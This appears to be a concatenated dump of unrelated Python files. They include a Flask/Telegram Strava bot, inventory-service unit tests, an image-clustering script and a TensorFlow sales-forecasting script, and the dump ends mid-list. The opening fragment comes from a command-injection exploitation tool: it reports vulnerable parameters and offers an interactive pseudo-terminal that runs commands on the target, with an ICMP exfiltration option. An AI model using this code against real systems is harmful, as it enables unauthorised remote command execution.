if shell:
found = True
no_result = False
if http_request_method == "GET":
# Print the findings to log file
if vp_flag == True:
output_file = open(filename + ".txt","a")
output_file.write("\n(+) Parameter : " + vuln_parameter + " (" + http_request_method + ")")
output_file.write("\n---\n")
vp_flag = False
output_file.close()
counter = counter + 1
output_file = open(filename + ".txt","a")
output_file.write(" ("+str(counter)+") Payload : "+ re.sub("%20"," ",payload) + "\n")
output_file.close()
# Print the findings to terminal.
print colors.BOLD + "\n(!) The ("+ http_request_method + ") '" + vuln_parameter +"' parameter is vulnerable to "+ injection_type +"."+ colors.RESET
print " (+) Type : "+ colors.YELLOW + colors.BOLD + injection_type + colors.RESET + ""
print " (+) Technique : "+ colors.YELLOW + colors.BOLD + technique.title() + colors.RESET + ""
print " (+) Parameter : "+ colors.YELLOW + colors.BOLD + vuln_parameter + colors.RESET + ""
print " (+) Payload : "+ colors.YELLOW + colors.BOLD + re.sub("%20"," ",payload) + colors.RESET
else :
# Print the findings to log file
if vp_flag == True:
output_file = open(filename + ".txt","a")
output_file.write("\n(+) Parameter : " + vuln_parameter + " (" + http_request_method + ")")
output_file.write("\n---\n")
vp_flag = False
output_file.close()
counter = counter + 1
output_file = open(filename + ".txt","a")
output_file.write(" ("+str(counter)+") Payload : "+ re.sub("%20"," ",payload) + "\n")
output_file.close()
# Print the findings to terminal.
print colors.BOLD + "\n(!) The ("+ http_request_method + ") '" + vuln_parameter +"' parameter is vulnerable to "+ injection_type +"."+ colors.RESET
print " (+) Type : "+ colors.YELLOW + colors.BOLD + injection_type + colors.RESET + ""
print " (+) Technique : "+ colors.YELLOW + colors.BOLD + technique.title() + colors.RESET + ""
print " (+) Parameter : "+ colors.YELLOW + colors.BOLD + vuln_parameter + colors.RESET + ""
print " (+) Payload : "+ colors.YELLOW + colors.BOLD + re.sub("%20"," ",payload) + colors.RESET
# Check for any enumeration options.
cb_enumeration.do_check(separator,TAG,prefix,suffix,whitespace,http_request_method,url,vuln_parameter)
# Pseudo-Terminal shell
gotshell = raw_input("\n(*) Do you want a Pseudo-Terminal shell? [Y/n] > ").lower()
if gotshell in settings.CHOISE_YES:
print ""
print "Pseudo-Terminal (type 'q' or use <Ctrl-C> to quit)"
while True:
try:
cmd = raw_input("Shell > ")
if cmd == "q":
sys.exit(0)
else:
# The main command injection exploitation.
response = cb_injector.injection(separator,TAG,cmd,prefix,suffix,whitespace,http_request_method,url,vuln_parameter)
# if need page reload
if menu.options.url_reload:
time.sleep(delay)
response = urllib.urlopen(url)
# Command execution results.
shell = cb_injector.injection_results(response,TAG)
if shell:
shell = "".join(str(p) for p in shell)
print "\n" + colors.GREEN + colors.BOLD + shell + colors.RESET + "\n"
except KeyboardInterrupt:
print ""
sys.exit(0)
else:
print "(*) Continue testing the "+ technique +"... "
pass
if no_result == True:
if menu.options.verbose == False:
print "[" + colors.RED + " FAILED "+colors.RESET+"]"
else:
print ""
return False
else :
print ""
def exploitation(url,delay,filename,http_request_method):
# Use the ICMP Exfiltration technique
if menu.options.ip_icmp_data:
icmp_exfiltration_handler(url,http_request_method)
else:
cb_injection_handler(url,delay,filename,http_request_method)
|
993,537 | b12dd5288ec5646d53f90aa519f58a5b6cd6844e | from image_processing.clustering import Cluster
import argparse
import glob
import cv2
import numpy as np
import csv
import pickle, pprint
# construct the argument parser and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument("-f", "--features_db", required = True,
help = "Path to the directory that stores images features")
ap.add_argument("-c", "--clusters", required = True,
help = "Path to where the clusters will be stored")
args = vars(ap.parse_args())
print('Getting images features...')
data = []
with open(args["features_db"]) as f:
reader = csv.reader(f)
for row in reader:
features = [float(x) for x in row[1:]]
features = np.asarray(features)
# each feature produced by ORB method is a vector of length 32
features = features.reshape(len(features)//128, 128)
for p in features:
data.append(p)
f.close()
# Perform clustering
print('Clustering...')
data = np.asarray(data)
# numCluster = len(data) // 100
numCluster = 150
clt = Cluster(numCluster)
cluster = clt.cluster(data)
print('Saving clusters...')
with open(args["clusters"], "wb") as fout:
pickle.dump(cluster, fout, pickle.HIGHEST_PROTOCOL)
fout.close()
|
993,538 | ec33d43090b9cc6dd9507251c3a09bf6ec4e4ead | import requests
import responses
import string
import unittest
import mock
from drift import app, inventory_service_interface
from drift.exceptions import InventoryServiceError, SystemNotReturned
from . import fixtures
class InventoryServiceTests(unittest.TestCase):
def setUp(self):
test_connexion_app = app.create_app()
test_flask_app = test_connexion_app.app
self.client = test_flask_app.test_client()
self.mock_logger = mock.Mock()
def _create_response_for_systems(self, service_hostname, system_uuids):
url_template = "http://%s/api/inventory/v1/hosts/%s"
responses.add(responses.GET, url_template % (service_hostname, system_uuids),
body=fixtures.FETCH_SYSTEMS_INV_SVC, status=requests.codes.ok,
content_type='application/json')
def _create_response_for_system_profiles(self, service_hostname, system_uuids):
url_template = "http://%s/api/inventory/v1/hosts/%s/system_profile?per_page=20"
responses.add(responses.GET, url_template % (service_hostname, system_uuids),
body=fixtures.FETCH_SYSTEM_PROFILES_INV_SVC, status=requests.codes.ok,
content_type='application/json')
def _create_500_response_for_systems(self, service_hostname, system_uuids):
url_template = "http://%s/api/inventory/v1/hosts/%s"
responses.add(responses.GET, url_template % (service_hostname, system_uuids),
body="I am error", status=requests.codes.INTERNAL_SERVER_ERROR,
content_type='application/json')
def _create_500_response_for_system_profiles(self, service_hostname, system_uuids):
url_template = "http://%s/api/inventory/v1/hosts/%s/system_profile?per_page=20"
responses.add(responses.GET, url_template % (service_hostname, system_uuids),
body="I am error", status=requests.codes.INTERNAL_SERVER_ERROR,
content_type='application/json')
@responses.activate
def test_fetch_systems_with_profiles(self):
systems_to_fetch = ['243926fa-262f-11e9-a632-c85b761454fa',
'264fb5b2-262f-11e9-9b12-c85b761454fa']
self._create_response_for_systems('inventory_svc_url_is_not_set',
','.join(systems_to_fetch))
self._create_response_for_system_profiles('inventory_svc_url_is_not_set',
','.join(systems_to_fetch))
systems = inventory_service_interface.fetch_systems_with_profiles(systems_to_fetch,
"my-auth-key",
self.mock_logger)
found_system_ids = {system['id'] for system in systems}
self.assertSetEqual(found_system_ids, set(systems_to_fetch))
@responses.activate
def test_fetch_systems_missing_system(self):
systems_to_fetch = ['243926fa-262f-11e9-a632-c85b761454fa',
'264fb5b2-262f-11e9-9b12-c85b761454fa',
'269a3da8-262f-11e9-8ee5-c85b761454fa']
self._create_response_for_systems('inventory_svc_url_is_not_set',
','.join(systems_to_fetch))
self._create_response_for_system_profiles('inventory_svc_url_is_not_set',
','.join(systems_to_fetch))
with self.assertRaises(SystemNotReturned) as cm:
inventory_service_interface.fetch_systems_with_profiles(systems_to_fetch,
"my-auth-key",
self.mock_logger)
self.assertEqual(cm.exception.message,
"System(s) 269a3da8-262f-11e9-8ee5-c85b761454fa not available to display")
@responses.activate
def test_fetch_systems_backend_service_error(self):
systems_to_fetch = ['243926fa-262f-11e9-a632-c85b761454fa',
'264fb5b2-262f-11e9-9b12-c85b761454fa',
'269a3da8-262f-11e9-8ee5-c85b761454fa']
self._create_500_response_for_systems('inventory_svc_url_is_not_set',
','.join(systems_to_fetch))
self._create_500_response_for_system_profiles('inventory_svc_url_is_not_set',
','.join(systems_to_fetch))
with self.assertRaises(InventoryServiceError) as cm:
inventory_service_interface.fetch_systems_with_profiles(systems_to_fetch,
"my-auth-key",
self.mock_logger)
self.assertEqual(cm.exception.message,
"Error received from backend service")
def test_fetch_too_many_systems(self):
systems_to_fetch = list(string.ascii_lowercase)
with self.assertRaises(SystemNotReturned) as cm:
inventory_service_interface.fetch_systems_with_profiles(systems_to_fetch, "my-auth-key",
self.mock_logger)
self.assertEqual(cm.exception.message,
"Too many systems requested, limit is 20")
|
993,539 | b5bffcc2c828b26be96c1e0ec7d28596365cfc9b | #-------------------------------------------------------------------------------
# Name: module1
# Purpose:
#
# Author: andr.stankevich
#
# Created: 28.11.2018
# Copyright: (c) andr.stankevich 2018
# Licence: <your licence>
#------------------------------------------------------------------------
import telebot
import json
import time
import requests
import urllib
from flask import Flask, request, redirect, session, url_for
from flask_sqlalchemy import SQLAlchemy
from requests_oauthlib import OAuth2Session
from telebot import types
from datetime import datetime
import config
import urllib.request
import urllib.parse
from sqlalchemy import exc
from telegraph import Telegraph
from jinja2 import Environment, PackageLoader, select_autoescape
#### начало проррамы 143 линия
#убрать в отдельный файл
TOKEN=config.TOKEN
bot = telebot.TeleBot(config.TOKEN, threaded=False)
client_id = config.client_id
client_secret = config.client_secret
scope = 'activity:read_all,activity:write,profile:read_all,profile:write'
authorization_base_url = 'https://www.strava.com/oauth/authorize'
token_url = 'https://www.strava.com/oauth/token'
refresh_url = 'https://www.strava.com/oauth/token'
response_typ = 'code'
redirect_uri = config.redirect_uri# Should match Site URL
start_uri = config.start_uri
webhook_uri=config.webhook_uri
tranings_list= ["AlpineSki", "BackcountrySki", "Canoeing", "Crossfit", "EBikeRide", "Elliptical", "Golf",
"Handcycle", "Hike", "IceSkate", "InlineSkate", "Kayaking", "Kitesurf", "NordicSki",
"Ride", "RockClimbing", "RollerSki", "Rowing, Run", "Sail, Skateboard", "Snowboard",
"Snowshoe", "Soccer", "StairStepper", "StandUpPaddling", "Surfing", "Swim", "Velomobile",
"VirtualRide", "VirtualRun", "Walk", "WeightTraining", "Wheelchair", "Windsurf", "Workout", "Yoga"]
Options_list= ["Display_last_10_trainigs","Display last 10 trainigs by activity type"," My year stat","my all time stat"]
keys_list_ride=['type','name','average_heartrate', 'average_speed',"average_watts", "max_heartrate", " max_watts", "id" ]
env = Environment( loader=PackageLoader('mysite', 'Template'), autoescape=select_autoescape(['html', 'xml']))
template = env.get_template('1.html')
###
app = Flask(__name__)
app.secret_key = config.key
app.config["SQLALCHEMY_DATABASE_URI"] = config.SQLALCHEMY_DATABASE_URI
app.config["SQLALCHEMY_POOL_RECYCLE"] = 200
app.config["SQLALCHEMY_TRACK_MODIFICATIONS"] = False
db = SQLAlchemy(app)
temp_data_dict={}
bot.enable_save_next_step_handlers(delay=2)
class StravaUser(db.Model):
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(80), unique=True)
telegram_chat_id = db.Column(db.String(120), unique=True)
token = db.Column(db.String(120), unique=True)
refresh_token= db.Column(db.String(120), unique=True)
last_seen= db.Column(db.DateTime, index=True, default=datetime.utcnow)
def __init__(self, username, telegram_chat_id, token, refresh_token):
self.username = username
self.telegram_chat_id =telegram_chat_id
self.token=token
self.refresh_token=refresh_token
def __repr__(self):
return '<User %r>' % self.username
@app.route('/data/<int:v_int>')
def data(v_int):
f=request.args.get("s_data")
f.encode("utf-8")
v=json.loads(f)
g=template.render(data=v)
return (g)
#### работа с сайтом
@app.route("/")
def bu():
return("<h1> Privet <h1>")
@app.route("/login", methods=["GET","POST"])
def login1():
messagechatid=request.args.get('message.chat.id', None)
# """Step 1: User Authorization. Redirect the user/resource owner to the OAuth provider (i.e. Strava) using an URL with a few key OAuth parameters."""
strava = OAuth2Session(client_id,scope=scope,redirect_uri=redirect_uri)
authorization_url, state =strava.authorization_url(authorization_base_url)
session['message.chat.id']=messagechatid
session['oauth_state'] = state
return redirect(authorization_url)
@app.route("/callback", methods=["GET","POST"])
def callback():
#print (request.args())
print(session)
message_chat_id=session["message.chat.id"]
stravalogin = OAuth2Session(client_id)
token = stravalogin.fetch_token(token_url, client_secret=client_secret,
authorization_response=request.url)
print(session)
from jinja92 import Template
print(session)
session['oauth_token'] = token
acces_test = User_filter_by_chat_id(message_chat_id, token["athlete"].get("firstname", "Кто-то без имени"), token['access_token'], token['refresh_token'])
t= Template("Hello {{ name }}!")
time.sleep(20)
if acces_test.Is_Exsist() == False:
if acces_test.acces_test():
acces_test.new_profile()
else:
bot.send_message(message_chat_id, "Why you see this mmesse???? WHY???????? pls Open activity read all ")
acces_test.login()
else: pass
return (t.render(name= session['oauth_token']["athlete"].get("firstname", "мы еще не знакомы")))
# @app.route("/refresh_token", methods=["GET","POST"])
# def refresh_token():
# messagechatid=request.args.get('message.chat.id', None)
@app.route("/webhook" + TOKEN, methods=['POST'])
def getMessage():
#обраотчик веб хука
if request.headers.get('content-type') == 'application/json':
json_string = request.get_data().decode('utf-8')
update = telebot.types.Update.de_json(json_string)
time.sleep(2)
bot.process_new_updates([update])
return 'bubju'
@app.route("/webhook", methods=["GET","POST"])
def webhook():
###тавим веб хук для бота надо вызывать это сайт из браузера
bot.remove_webhook()
bot.set_webhook(url=webhook_uri + TOKEN)
return ("!", 200)
def trainigslist_get():
keyboard1 = types.ReplyKeyboardMarkup(one_time_keyboard=True, resize_keyboard=True)
# to_sent1 = f"lasttrainigN:Ride:{token}"
# to_sent2 = f"lasttrainigN:Run:{token}"
# to_sent3 = f"lasttrainigN:Swim:{token}"
# to_sent4 = f"lasttrainigN:VirtualRide:{token}"
button1 = types.InlineKeyboardButton(text= "Bike", callback_data=to_sent )
button2 = types.InlineKeyboardButton(text= "Run", callback_data=to_sent1 )
button3 = types.InlineKeyboardButton(text= "Swim", callback_data=to_sent2 )
button4 = types.InlineKeyboardButton(text= "VirtualRide", callback_data=to_sent3 )
keyboard1.add(button1, button2 , button3,button4)
bot.send_message(session["message.chat.id"], "chouse to see last trainigs", reply_markup=keyboard1)
# return (t.render(something= r["firstname"]))
def sent_filtered_data(num, chat_id, query_string=1):
sent= "Название тренировки {} \n тип тренироки {} \n максимальный пульс {} \n средняя мощность {}".format(num["name"],
num["type"],
num.get("max_heartrate", "нэт его") ,
num.get("average_watts", "в нет"))
bot.send_message(chat_id, sent)
class User_filter_by_chat_id():
def __init__(self, chat_id, name= None, token = None, refresh_token = None):
self.chat_id=chat_id
if token and refresh_token and name:
self.token = token
self.refresh_token=refresh_token
self.name=name
self.user_to_find = StravaUser.query.filter_by(telegram_chat_id=self.chat_id).first()
else:
try:
self.user_to_find = StravaUser.query.filter_by(telegram_chat_id=self.chat_id).first()
if self.user_to_find :
self.token = self.user_to_find.token
self.refresh_token=self.user_to_find.refresh_token
self.name = self.user_to_find.username
else:
pass
except exc.SQLAlchemyError as e:
bot.send_message(self.chat_id, "SQL data base failed FML")
def Is_Exsist(self):
if self.user_to_find:
return True
else:
return False
def refresh_data(self):
print('refreshing db')
self.user_to_find.token= self.token
self.user_to_find.refresh_token=self.refresh_token
self.user_to_find.last_seen= datetime.utcnow
db.session.commit()
def del_user(self):
db.session.delete(self.user_to_find)
db.session.commit()
def manual_refresh(self):
extra = {
'client_id': client_id,
'client_secret': client_secret,
}
strava = OAuth2Session (client_id, )
v = strava.refresh_token(refresh_url, refresh_token=self.user_to_find.refresh_token, **extra)
db.session.merge(self.user_to_find)
self.user_to_find.token= v.get("access_token", "no_data")
self.user_to_find.refresh_token=v["refresh_token"]
db.session.commit()
print(self.refresh_token)
def acces_test(self, page=1 ,per_page=1):
try:
url="https://www.strava.com/api/v3/athlete/activities"
param={"per_page":f"{per_page}","page":f"{page}"}
headers = {'Authorization': "Bearer "+self.token}
initial_response=requests.get(url, params=param, headers = headers, allow_redirects=False)
data2=initial_response.json()
print("geting acces")
if initial_response.status_code == requests.codes.ok:
print(data2)
return(True)
if initial_response.headers.get("status") == "401 Unauthorized":
return (None)
except requests.exceptions.ConnectionError as e:
print( "Error: on url {}".format(e))
def login(self):
keyboard = types.InlineKeyboardMarkup()
params = urllib.parse.urlencode({'message.chat.id': self.chat_id})
uri = start_uri+params
url_button = types.InlineKeyboardButton(text="залогиниться в стравe", url=uri)
keyboard.add(url_button)
bot.send_message(self.chat_id, "Привет! Нажми на кнопку и перейди в eбучую страву.", reply_markup=keyboard)
return (True)
def new_profile(self):
new_user=StravaUser(self.name, self.chat_id, self.token, self.refresh_token)
db.session.add(new_user)
try:
db.session.commit()
except exc.SQLAlchemyError:
bot.send_message(self.chat_id, "SQL data base failed FML")
@bot.message_handler(commands=['start'])
def start(message):
bot.send_message(message.chat.id, 'Hello,this is strava bot one day your could analize strava in telegram. now days run in test mode ')
######### Вот и начинается ебалала блять как передать mesage chat id в @app.route("/login")
user=User_filter_by_chat_id(message.chat.id)
if user.Is_Exsist():
bot.send_message(message.chat.id, 'Hello old friend {}'.format(user.username()), reply_markup=types.ReplyKeyboardRemove())
firstlist(message.chat.id)
else:
user.login()
@bot.message_handler(commands=['stop'])
def del_use(message):
user_del=User_filter_by_chat_id(message.chat.id)
if user_del.Is_Exsist():
bot.send_message(message.chat.id, 'By old friend {} '.format(user_del.username()), reply_markup=types.ReplyKeyboardRemove())
user_del.del_user()
else:
bot.send_message(message.chat.id, "If dog doen't sheet it will exsplloed\n Create new account first",reply_markup=types.ReplyKeyboardRemove())
@bot.message_handler(commands=['revoke_token'])
def revoke_token(message):
bot.send_message(message.chat.id, 'problems? ')
######### Вот и начинается ебалала блять как передать mesage chat id в @app.route("/login")
user=User_filter_by_chat_id(message.chat.id)
print(user)
if user.Is_Exsist():
bot.send_message(message.chat.id, 'Hello old friend {} revoking your token'.format(user.username()), reply_markup=types.ReplyKeyboardRemove())
user.manual_refresh()
else:
user.login()
### тут уже обработчик стравы api тож в отдельный класс
def getlasttrainigs(chat_id, page=1 ,days_to_search=10, activity=True, efforts=True):
try:
print("gettonglast_traings")
new_user=User_filter_by_chat_id(chat_id)
token= new_user.token
print(token)
url="https://www.strava.com/api/v3/athlete/activities"
param={"per_page":"200","page":f"{page}"}
headers = {'Authorization': "Bearer "+token}
initial_response=requests.get(url, params=param, headers = headers, allow_redirects=False)
data2=initial_response.json()
bot.send_chat_action(chat_id, 'typing') # show the bot "typing" (max. 5 secs)
if initial_response.status_code == requests.codes.ok:
##print(data2)
return (data2)
else:
try:
new_user.manual_refresh()
bot.send_message(chat_id, "updating token")
token1 = new_user.token
headers1 = {'Authorization': "Bearer "+token1}
print(token)
initial_response=requests.get(url, params=param, headers = headers1, allow_redirects=False)
data2=initial_response.json()
bot.send_chat_action(chat_id, 'typing') # show the bot "typing" (max. 5 secs)
return(data2)
except requests.exceptions.ConnectionError as e:
bot.send_message(chat_id, "OOOOPPPS some errors with token pls log_out and login, {}".format(e))
return (None)
except requests.exceptions.ConnectionError as e:
#print(r.url)
bot.send_message(chat_id, "OOOOPPPS some errors with token pls log_out and login, {}".format(e))
def sent_last_trainigs(message,step=0 ,activiteis=50 ):
# отправляем тока RIde i vyvodim puls i power
chat_id=message.chat.id
activiteis=activiteis
print(message.text)
if message.text in tranings_list:
tupe = message.text
if message.text == "back":
firstlist(chat_id)
if message.text == "/Start":
firstlist(chat_id)
bot.send_chat_action(chat_id, 'typing') # show the bot "typing" (max. 5 secs)
print("tupe fromsecon click{}".format(tupe))
listdata, step =list_get(chat_id, step,activiteis=activiteis, filtrer_act = tupe, filter_off= False)
list_to_sent=sent_url_post(preSort(listdata))
print(list_to_sent)
bot.send_message(message.chat.id, "{}".format(list_to_sent))
#dict_new= json.dumps(preSort(listdata))
#sent_url=url_for('data',v_int =1213214,s_data = dict_new)
#bot.send_message(message.chat.id, "http://astanly.pythonanywhere.com{}".format(sent_url))
keyboard1 = types.ReplyKeyboardMarkup(one_time_keyboard=True, resize_keyboard=True)
[keyboard1.add(i) for i in ["back", f"{message.text}"]]
msg=bot.send_message(message.chat.id, "What shoud i do next?\n To see more data press {}{}".format(message.text, step), reply_markup=keyboard1)
if step >= 0:
step+=1
bot.register_next_step_handler(msg, sent_last_trainigs, step=step,activiteis=activiteis )
def list_get(chat_id,step,filtrer_act,filter_off, activiteis=50):
# отправляем тока RIde i vyvodim puls i power
chat_id=chat_id
page=0
v=[]
if all([chat_id in temp_data_dict, step>0]):
train_list=temp_data_dict[chat_id]
print(train_list)
page=train_list[step-1]["step"]["page"]
v=train_list[step-1]["step"]["data"]
if step ==0:
d=[]
temp_data_dict[chat_id]=d
bot.send_message(chat_id, "filtering activities")
while len(v)<(activiteis+activiteis*step):
page+=1
if page < (20+20*step):
listdata=getlasttrainigs(chat_id,page)
bot.send_chat_action(chat_id, 'typing') # show the bot "typing" (max. 5 secs)
i= [num for num in listdata if any([num["type"]== filtrer_act, filter_off==True])]
v.extend(i)
else:
bot.send_message(chat_id, "In your 400 activivteies \n only {} found ".format(len(v)))
step=-1
break
if len(v)>0:
temp_dict={"step":{"data":v, "length":len(v), "page":page}}
temp_list=temp_data_dict[chat_id]
temp_list.append(temp_dict)
temp_data_dict[chat_id]=temp_list
if step == 0:
print( "step{}".format(step))
try:
del v[activiteis:len(v)]
except:
pass
if step == -2:
bot.send_message(chat_id, "we are going to reach singularity!??")
if step > 0:
try:
del v[(activiteis*step+activiteis):len(v)]
del v[0:activiteis*step]
if len(v)<activiteis:
step=-1
except:
pass
return (v,step)
def preSort(m):
list_new=[]
for i in m:
dict_new={key: val for key, val in i.items() if key in keys_list_ride}
print(dict_new)
list_new.append(dict_new)
print(list_new)
return(list_new)
def sent_url_post(data_to_sent):
m=template.render(data=data_to_sent)
print (m)
telegraph = Telegraph()
telegraph.create_account(short_name="starava_bot")
response = telegraph.create_page('ioiioio data',html_content=m)
print(response)
return('https://telegra.ph/{}'.format(response['path']))
def trainigslist(message):
if message.text == "Display last 10 trainigs by activity type":
keyboard1 = types.ReplyKeyboardMarkup(one_time_keyboard=True, resize_keyboard=True)
for i in tranings_list:
keyboard1.add(i)
msg1=bot.send_message(message.chat.id, "choose activite to getlist to see last trainigs", reply_markup=keyboard1)
bot.register_next_step_handler(msg1, sent_last_trainigs,step=0)
if message.text == "Display_last_10_trainigs":
listdata=list_get(message.chat.id, activiteis=10,filter_act="blabla", filter_off= True )
#list_to_sent=sent_url_post(preSort(listdata))
#bot.send_message(message.chat.id, "{}".format(list_to_sent))
dict_new= json.dumps(preSort(listdata))
sent_url=url_for('data',v_int =1213214,s_data = dict_new)
bot.send_message(message.chat.id, "http://astanly.pythonanywhere.com{}".format(sent_url))
firstlist(message.chat.id, msg_1 ="what_next")
if message.text == "back":
firstlist(message.chat.id, msg_1 ="what_next")
def firstlist(chat_id, msg_1="chouse to see last trainigs"):
keyboard1 = types.ReplyKeyboardMarkup(one_time_keyboard=True, resize_keyboard=True)
for i in Options_list:
keyboard1.add(i)
keyboard1.add("back")
msg=bot.send_message(chat_id, msg_1, reply_markup=keyboard1)
bot.register_next_step_handler(msg, trainigslist)
if __name__ == '__main__':
app.run(threaded=False)
|
993,540 | 2b411daa6ec21ffec907545c98c5b27d9bb268d2 | """
Code documentation for Microservice
.. include:: ./README.md
"""
from main import app
if __name__ == '__main__':
app.run(host=app.config['HOST'], port=app.config['PORT'])
|
993,541 | dbee7acdd8d7d4f46763565dd8d431a057f82258 | class Warehouse:
purpose = 'storage'
region = 'west'
w1 = Warehouse()
print(w1.purpose,w1.region)
w2 = Warehouse()
w2.region = 'east'
print(w2.purpose,w2.region)
|
993,542 | 3d329341d0bffff80c3a5bbc0acbe2b803fa6468 | # -*- coding: utf-8 -*-
# @Time : 2020/6/18 10:06
# @Author : skydm
# @Email : wzwei1636@163.com
# @File : high_train.py
# @Software: PyCharm
import os
import pickle
import numpy as np
import pandas as pd
from sklearn.metrics import mean_squared_error
from sklearn.model_selection import train_test_split
import tensorflow as tf
desired_width = 320
pd.set_option('display.width', desired_width) # 控制工作台显示区域的宽度
pd.set_option('display.max_columns', None) # 控制工作太显示多少列
os.environ["CUDA_VISIBLE_DEVICES"] = "3"
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' # 警告信息
def read_from_pickle(file):
"""
读取pickle文件
"""
f = open(file, "rb")
df = pickle.load(f)
return df
def areaid_dummy(df):
"""将区域id转化为哑变量"""
areaid_list = [1, 7, 84, 5, 12, 6, 46, 51, 16]
area_dict = {value: key for key, value in enumerate(areaid_list)}
df["areaid"] = df["areaid"].map(area_dict)
areaid_df = pd.get_dummies(df['areaid'], prefix='areaid')
areaid_df = areaid_df.rename(lambda col: col.replace('.0', ''), axis='columns')
# 拼接数据
df = df.join(areaid_df)
return df
def cate_dummy(df):
"""将类目转化为哑变量"""
cate = ["Antiques", "Jewellery&Watches", "Art", "SportingGoods", "CarsMotorcycles&Vehicles",
"Holidays&Travel", "PetSupplies", "MobilePhones&Communication", "EverythingElse",
"BusinessOffice&Industrial",
"VehicleParts&Accessories", "VideoGames&Consoles", "Collectables", "Crafts", "MusicalInstruments",
"PotteryPorcelain&Glass", "Garden&Patio", "PackageMaterial", "Health&Beauty", "SportsMemorabilia",
"Computers/Tablets&Networking", "Sound&Vision", "Toys&Games", "ClothesShoes&Accessories", "EventsTickets",
"ConsumptiveMaterial", "HomeFurniture&DIY", "Coins", "Cameras&Photography", "Stamps",
"eBayMotors", "Wholesale&JobLots", "Baby", "Dolls&Bears", "Music", "DVDsFilms&TV", "BooksComics&Magazines"]
cate_dict = dict(zip(cate, range(len(cate))))
df["categoryid"] = df["categoryid"].map(cate_dict)
cate_df = pd.get_dummies(df['categoryid'], prefix='categoryid')
cate_df = cate_df.rename(lambda col: col.replace('.0', ''), axis='columns')
# 拼接数据
df = df.join(cate_df)
return df
def get_nonzero_week(x):
"""
获取过去一年中第一个非零的周的位置
"""
n = 52
l = ['last_{}week'.format(i) for i in range(52, 0, -1)]
for week in l:
if x[week] > 0:
break
else:
n -= 1
return n
def get_nonzero_month(x):
"""
获取过去一年中第一个非零的月的位置
"""
n = 12
l = ['last_{}month'.format(i) for i in range(12, 0, -1)]
for month in l:
if x[month] > 0:
break
else:
n -= 1
return n
def get_mean_week(x):
"""
获取有效周的均值
"""
l = ['last_{}week'.format(i) for i in range(52, 0, -1)]
sum_ = 0
for week in l[::-1][:int(x["num_week"])]:
sum_ += x[week]
try:
mean_week = sum_ / int(x["num_week"])
except Exception as e:
mean_week = -99
return mean_week
def get_mean_month(x):
"""
获取有效月的均值
"""
l = ['last_{}month'.format(i) for i in range(12, 0, -1)]
sum_ = 0
for month in l[::-1][:int(x["num_month"])]:
sum_ += x[month]
try:
mean_month = sum_ / int(x["num_month"])
except Exception as e:
mean_month = -999
return mean_month
def get_week_var(x):
"""
获取有效周的方差
"""
l = ['last_{}week'.format(i) for i in range(52, 0, -1)]
save_cols = []
for week in l[::-1][:int(x["num_week"])]:
save_cols.append(x[week])
return np.var(save_cols)
def get_month_var(x):
"""
获取有效月的方差
"""
l = ['last_{}month'.format(i) for i in range(12, 0, -1)]
save_cols = []
for month in l[::-1][:int(x["num_month"])]:
save_cols.append(x[month])
return np.var(save_cols)
def week_month_derive_feat(df):
'''
:return: 返回关于周或者月的衍生特征
'''
pro_week_cols = ['last_{}week'.format(i) for i in range(2, 53)]
for_week_cols = ['last_{}week'.format(i) for i in range(1, 52)]
# 周之间的差
for index, _ in enumerate(for_week_cols):
df["diff_week_" + str(index + 2) + "_" + str(index + 1)] = df[pro_week_cols[index]] - df[for_week_cols[index]]
pro_month_cols = ['last_{}month'.format(i) for i in range(2, 13)]
for_month_cols = ['last_{}month'.format(i) for i in range(1, 12)]
# 月之间的差
for index, _ in enumerate(for_month_cols):
df["diff_month_" + str(index + 2) + "_" + str(index + 1)] = df[pro_month_cols[index]] - df[
for_month_cols[index]]
# 过去三个月的总销量
df["last_3month_sum"] = df["last_1month"] + df["last_2month"] + df["last_3month"]
return df
class Model:
def __init__(self, batch_size, input_size, output_size, learning_rate, num_units=[256, 128, 64]):
with tf.name_scope("placeholders"):
self.X = tf.placeholder(tf.float32, (None, input_size), name='input_x')
self.Y = tf.placeholder(tf.float32, (None, output_size), name='input_y')
with tf.name_scope("dnn"):
layer1 = tf.layers.dense(self.X, num_units[0], activation=tf.nn.relu)
layer2 = tf.layers.dense(layer1, num_units[1], activation=tf.nn.relu)
layer3 = tf.layers.dense(layer2, num_units[2], activation=tf.nn.relu)
with tf.name_scope("prediction"):
self.logits = tf.layers.dense(layer3, output_size)
with tf.name_scope("loss"):
self.loss = tf.reduce_mean(tf.abs(self.logits - self.Y))
with tf.name_scope("optimizer"):
self.optimizer = tf.train.AdamOptimizer(learning_rate).minimize(self.loss)
with tf.name_scope("summaries"):
tf.summary.scalar("loss", self.loss)
self.merged = tf.summary.merge_all()
self.train_writer = tf.summary.FileWriter('./tmp/dnn_train', tf.get_default_graph())
self.valid_writer = tf.summary.FileWriter('./tmp/dnn_valid', tf.get_default_graph())
tf.add_to_collection('dnn_predict', self.logits)
def data_process(df):
# 获取周和月的衍生特征
df = week_month_derive_feat(df)
# 获取波动特征
df["num_week"] = df.apply(lambda x: get_nonzero_week(x), axis=1)
df["num_month"] = df.apply(lambda x: get_nonzero_month(x), axis=1)
df["mean_week"] = df.apply(lambda x: get_mean_week(x), axis=1)
df["mean_month"] = df.apply(lambda x: get_mean_month(x), axis=1)
df["var_week"] = df.apply(lambda x: get_week_var(x), axis=1)
df["var_month"] = df.apply(lambda x: get_month_var(x), axis=1)
# 区域
df = areaid_dummy(df)
# 类目
df = cate_dummy(df)
X_cols = ["productid", "propertyid", "areaid", "last_1week", "last_2week", "last_3week", "last_4week", "last_5week",
"last_6week", "last_7week", "last_8week", "last_9week", "last_10week", "last_11week", "last_12week",
"last_13week", "last_14week", "last_15week", "last_16week", "last_17week", "last_18week", "last_19week",
"last_20week", "last_21week", "last_22week", "last_23week", "last_24week", "last_25week", "last_26week",
"last_27week", "last_28week", "last_29week", "last_30week", "last_31week", "last_32week", "last_33week",
"last_34week", "last_35week", "last_36week", "last_37week", "last_38week", "last_39week", "last_40week",
"last_41week", "last_42week", "last_43week", "last_44week", "last_45week", "last_46week", "last_47week",
"last_48week", "last_49week", "last_50week", "last_51week", "last_52week", "last_1month", "last_2month",
"last_3month", "last_4month", "last_5month", "last_6month", "last_7month", "last_8month", "last_9month",
"last_10month", "last_11month", "last_12month", "pred_1month", "instock", "stock_div_last_1week",
"stock_div_last_2weeks", "stock_div_last_1month", 'diff_week_2_1', 'diff_week_3_2', 'diff_week_4_3',
